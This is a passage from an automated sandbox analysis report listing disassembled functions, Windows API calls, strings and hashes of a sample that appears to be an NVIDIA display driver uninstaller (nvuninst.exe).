                                  • Opcode ID: 855db544435c6aa114258c3983ec9c1564e9080ca8cddabba0ecf3942d9da265
                                  • Instruction ID: a98bd402f7d999ba69e77d247a110338cebfd24b00f2be8ff21fa6d0cbc3f162
                                  • Opcode Fuzzy Hash: 855db544435c6aa114258c3983ec9c1564e9080ca8cddabba0ecf3942d9da265
                                  • Instruction Fuzzy Hash: C0419CB1748310B6D205F6625C57FAF22994B94B08F50043FB545B62C2FEFDA64982DF
                                  Function 00404310 Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 131COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • __strdup.LIBCMT ref: 00404344
                                  • __strdup.LIBCMT ref: 0040435D
                                    • Part of subcall function 0040D4C5: _strlen.LIBCMT ref: 0040D4D8
                                    • Part of subcall function 0040D4C5: _malloc.LIBCMT ref: 0040D4E1
                                    • Part of subcall function 0040D4C5: _strcpy_s.LIBCMT ref: 0040D4F1
                                    • Part of subcall function 0040D4C5: __invoke_watson.LIBCMT ref: 0040D502
                                  • __strdup.LIBCMT ref: 00404377
                                  • __strdup.LIBCMT ref: 00404391
                                  • __strdup.LIBCMT ref: 004043AB
                                  • __strdup.LIBCMT ref: 004043C5
                                  • __strdup.LIBCMT ref: 004043DE
                                  • __strdup.LIBCMT ref: 004043F3
                                  • __strdup.LIBCMT ref: 00404408
                                  • __strdup.LIBCMT ref: 0040441D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __strdup$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__invoke_watson_fprintf_malloc_strcpy_s_strlen
                                  • String ID: Current Root Key$GetBaseKey: unknown basekey for registry string$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_PERFORMANCE_DATA$HKEY_USERS$HKLM$HKPD$HKU$UninstCommandClass::GetBaseKey(%s)
                                  • API String ID: 1364564273-1417559939
                                  • Opcode ID: 82c500d7cf9eb2ec896d0a926c75c73172bebc4e880bed359c5f2a648d5cddbd
                                  • Instruction ID: 25fa075fb6db4cab69ab63d03ab34403816fbeca2fa5f7e0c96b3cdd8f8a1041
                                  • Opcode Fuzzy Hash: 82c500d7cf9eb2ec896d0a926c75c73172bebc4e880bed359c5f2a648d5cddbd
                                  • Instruction Fuzzy Hash: 8B41D0B1B443009FD361DF26AC8276A3BA4AB85714F64413FF908A7392DB3C5465CB9E
                                  Function 004073D0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 183windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,0000100C,000000FF,00000000), ref: 00407442
                                  • IsDlgButtonChecked.USER32(?,000003F6), ref: 0040744C
                                  • IsDlgButtonChecked.USER32(?,000003F1), ref: 0040745C
                                  • SendMessageA.USER32(?,0000102C,00000000,0000F000), ref: 0040749A
                                  • SendMessageA.USER32 ref: 004074CE
                                  • SendMessageA.USER32(?,0000100C,00000000,00000000), ref: 0040751F
                                  • EndDialog.USER32(?,00000001), ref: 0040752F
                                  • GetDlgItem.USER32(?,000003E9), ref: 0040757F
                                  • _memset.LIBCMT ref: 004075A6
                                  • GetDlgItem.USER32(?,000003F6), ref: 004075C8
                                  • EnableWindow.USER32(00000000), ref: 004075D1
                                  • CheckDlgButton.USER32(?,000003F1,00000001), ref: 00407621
                                  • EnableWindow.USER32(?,00000000), ref: 00407630
                                  Strings
                                  • NVIDIA Display Driver, xrefs: 004074DB
                                  • UninstCommandClass::UnInstallGUIDlg, xrefs: 004073EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Button$CheckedEnableItemTimeWindow_fputs$CheckDebugDialogFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset
                                  • String ID: NVIDIA Display Driver$UninstCommandClass::UnInstallGUIDlg
                                  • API String ID: 1978538268-526843834
                                  • Opcode ID: 96f4d9e65c9a7aaa1ec507ff2d41e7e1d27f02c6007ef3a51dff7e17adebee91
                                  • Instruction ID: 7748c24517757048e594ea8123445ab3cf90005cb6d811f2e1fd6e58bd807257
                                  • Opcode Fuzzy Hash: 96f4d9e65c9a7aaa1ec507ff2d41e7e1d27f02c6007ef3a51dff7e17adebee91
                                  • Instruction Fuzzy Hash: DE512B30A08305ABD720DF64DC45FBB37A8EB44700F40493EFA01A72D1CBB9A845CB9A
                                  Function 0040B180 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 211fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,00000104,00000104,?,?), ref: 0040B1AB
                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00010009,00260010), ref: 0040B2B5
                                  • CopyFileA.KERNEL32(?,00000000,00000000), ref: 0040B2BF
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 0040B2FB
                                    • Part of subcall function 004080A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00408103
                                    • Part of subcall function 004080A0: GetFileVersionInfoSizeA.VERSION(?,?), ref: 0040810F
                                    • Part of subcall function 004080A0: GlobalAlloc.KERNEL32(00000042,00000000,?,?), ref: 0040811D
                                    • Part of subcall function 004080A0: GlobalLock.KERNEL32(00000000), ref: 0040812A
                                    • Part of subcall function 004080A0: GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 00408137
                                    • Part of subcall function 004080A0: VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 00408150
                                    • Part of subcall function 004080A0: GlobalUnlock.KERNEL32(00000000), ref: 0040817E
                                    • Part of subcall function 004080A0: GlobalFree.KERNEL32(00000000), ref: 00408185
                                    • Part of subcall function 004080A0: GetFileVersionInfoSizeA.VERSION(?,?,?,?), ref: 00408197
                                    • Part of subcall function 004080A0: GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?), ref: 004081A5
                                    • Part of subcall function 004080A0: GlobalLock.KERNEL32(00000000), ref: 004081B2
                                    • Part of subcall function 004080A0: GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 004081BF
                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00010009,00260010), ref: 0040B33D
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B34E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$Global$InfoVersion$AllocAttributesCopyLockSizeTime_fputs$DebugDirectoryFormatFreeLocalModuleMutexNameObjectOutputQueryReleaseSingleStringSystemUnlockValueWait_fprintf_sprintf
                                  • String ID: %s\system32\nvuninst.exe$DUMMY_INSTANCEID$DevInstanceID$Error updating file$File [%s] is up-to-date$LeaveDriverStoreCache$Set Current Reg Key$Set Current Reg Name$Set Current Reg Value$Set Current Root Key$Set Enum Last Reg Key$Uninstaller [%s] version %d.%d.%d.%d running$Updating old file [%s]$sysdir$windir
                                  • API String ID: 1418329812-2938187850
                                  • Opcode ID: e661dd150dd4afbcde81a19fcf387fd0949fe409307c19d94f04ad3511b5b95f
                                  • Instruction ID: 853348aadae27bff7ff6b9a27ebd8f4a70b8e9ed6c7c73fcbe45c83cca92c257
                                  • Opcode Fuzzy Hash: e661dd150dd4afbcde81a19fcf387fd0949fe409307c19d94f04ad3511b5b95f
                                  • Instruction Fuzzy Hash: 2451587170030467C714AB719C63FAB37859B99748F54093EF946B72C3EA7DA90883AD
                                  Function 00405ED0 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 208COMMON
                                  Download Yara Rule
                                  Strings
                                  • GetRegistry: cannot find '\', xrefs: 00405F65
                                  • Clearing variable %s., xrefs: 00406081
                                  • Failed to open KeyPath %s., xrefs: 00405FA9
                                  • Failed to open BaseKey., xrefs: 00405F35
                                  • Failed to query Value %s., xrefs: 00406028
                                  • Handle failed or failed to query Value %s., xrefs: 004060CE
                                  • GetRegistry: invalid number of arguments, xrefs: 00405EFC
                                  • UninstCommandClass::GetRegistry(%s), xrefs: 00405EDA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: Clearing variable %s.$Failed to open BaseKey.$Failed to open KeyPath %s.$Failed to query Value %s.$GetRegistry: cannot find '\'$GetRegistry: invalid number of arguments$Handle failed or failed to query Value %s.$UninstCommandClass::GetRegistry(%s)
                                  • API String ID: 4132451974-2754830086
                                  • Opcode ID: 2e6ad7e279f25026bc119b6dbaae34d94337c9c78bae42e7b3f88a97de52f63f
                                  • Instruction ID: 2645a307ba977772fdbfed0052e8f7cdcb873b7eef51b05e98ff4a9dca2aa226
                                  • Opcode Fuzzy Hash: 2e6ad7e279f25026bc119b6dbaae34d94337c9c78bae42e7b3f88a97de52f63f
                                  • Instruction Fuzzy Hash: A6511FB2B443106BD310EB75AC41EAB7B9CEF94314F04093BF945A3281F679E914C6EA
                                  Function 0041389B Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 156fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _strcpy_s.LIBCMT ref: 00413907
                                  • __invoke_watson.LIBCMT ref: 00413918
                                  • GetModuleFileNameA.KERNEL32(00000000,0042B2D9,00000104,0040B4E2,?), ref: 00413934
                                  • _strcpy_s.LIBCMT ref: 00413949
                                  • __invoke_watson.LIBCMT ref: 0041395C
                                  • _strlen.LIBCMT ref: 00413965
                                  • _strlen.LIBCMT ref: 00413972
                                  • __invoke_watson.LIBCMT ref: 0041399F
                                  • _strcat_s.LIBCMT ref: 004139B2
                                  • __invoke_watson.LIBCMT ref: 004139C3
                                  • _strcat_s.LIBCMT ref: 004139D4
                                  • __invoke_watson.LIBCMT ref: 004139E5
                                  • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77435E70,00000003,00413A67,000000FC,0040FE4C,00000001,00000000,00000000,?,00411A6B,0040B4E2,00000001), ref: 00413A04
                                  • _strlen.LIBCMT ref: 00413A25
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,0040B462,00000000,?,00411A6B,0040B4E2,00000001,?,004119B7,00000018,004233A8,0000000C,00411A46,?), ref: 00413A2F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 1879448924-4022980321
                                  • Opcode ID: 90722357092192b5ab65a9da1887331e2cc34f6ae0c878e98eb3b611f3a5f837
                                  • Instruction ID: 728515e27f9d96cd5a8af33a122b176d61e118c7b566c5b050aee71ac3ea5e33
                                  • Opcode Fuzzy Hash: 90722357092192b5ab65a9da1887331e2cc34f6ae0c878e98eb3b611f3a5f837
                                  • Instruction Fuzzy Hash: 82316EF2A402153AE5207A365D06FBB324C9F113A9F450137FD45A12D2FB6D9A8681FE
                                  Function 00404870 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                  • PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  • PathIsDirectoryA.SHLWAPI(?), ref: 004048EE
                                  • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00404913
                                  • __time32.LIBCMT ref: 0040491B
                                  • _rand.LIBCMT ref: 00404926
                                  • _swprintf.LIBCMT ref: 0040493C
                                  • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00404962
                                  • GetLastError.KERNEL32 ref: 00404978
                                  • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040499F
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$DirectoryMovePathTime_fputs$AttributesDebugErrorFormatLastLocalMutexObjectOutputReleaseSingleStringWait__time32_fprintf_rand_swprintf
                                  • String ID: %s-nv%d$Failed$NULL$Renaming %s to %s$Succeeded$UninstCommandClass::NvReplaceFileOnReboot - %s$UninstCommandClass::NvReplaceFileOnReboot - File does not exist$UninstCommandClass::NvReplaceFileOnReboot - Invaid path parameter instead of file$UninstCommandClass::NvReplaceFileOnReboot - Rename of %s %s (error:%d)$UninstCommandClass::NvReplaceFileOnReboot(%s,%s)
                                  • API String ID: 3498336020-3514494225
                                  • Opcode ID: d9d5937ad11d0a00826c1716c76499b846d8f831eeed15d4e8d659da41821490
                                  • Instruction ID: 6295671737825a11f12bde8a9546047efc38c4797ded0eb247e85bb343121b86
                                  • Opcode Fuzzy Hash: d9d5937ad11d0a00826c1716c76499b846d8f831eeed15d4e8d659da41821490
                                  • Instruction Fuzzy Hash: 90310AF6A403107BD210B7659C42FEB3A4C9F9A358F04453BFA44A32C1E67C994586EE
                                  Function 00409D50 Relevance: 29.9, APIs: 4, Strings: 13, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: <$Current Parser Path$Driver install %s a reboot$Failed when we called UpdateDriverForPlugAndPlayDevices$InstallDriver: invalid number of arguments$SysCallAndWait %s\%s %ld %s %s$UninstCommandClass::InstallDriver$Win95$Win98$doesn't require$nvupnp-amd64.exe$nvupnp-ia64.exe$requires
                                  • API String ID: 4132451974-842954344
                                  • Opcode ID: 0a3140c997d938c55d3a8dcc526be492d4007ce3206d898fcea2c7d7eae49abe
                                  • Instruction ID: 42460058576d8b77fc55ddd8d981fed2b7b9867c0d2816596afe44e5bd57d26b
                                  • Opcode Fuzzy Hash: 0a3140c997d938c55d3a8dcc526be492d4007ce3206d898fcea2c7d7eae49abe
                                  • Instruction Fuzzy Hash: 3351D670604741ABD724EA658C06FBB76D8AB94709F00083FF549E62C3DB7C9D4987AE
                                  Function 0040F0CD Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040E1D0), ref: 0040F0D3
                                  • __mtterm.LIBCMT ref: 0040F0DF
                                    • Part of subcall function 0040EE21: TlsFree.KERNEL32(00000012,0040F24C), ref: 0040EE4C
                                    • Part of subcall function 0040EE21: DeleteCriticalSection.KERNEL32(00000000,00000000,7556DFB0,00000001,0040F24C), ref: 0041191B
                                    • Part of subcall function 0040EE21: DeleteCriticalSection.KERNEL32(00000012,7556DFB0,00000001,0040F24C), ref: 00411945
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040F0F5
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040F102
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040F10F
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040F11C
                                  • TlsAlloc.KERNEL32 ref: 0040F16C
                                  • TlsSetValue.KERNEL32(00000000), ref: 0040F187
                                  • __init_pointers.LIBCMT ref: 0040F191
                                  • __calloc_crt.LIBCMT ref: 0040F206
                                  • GetCurrentThreadId.KERNEL32 ref: 0040F236
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
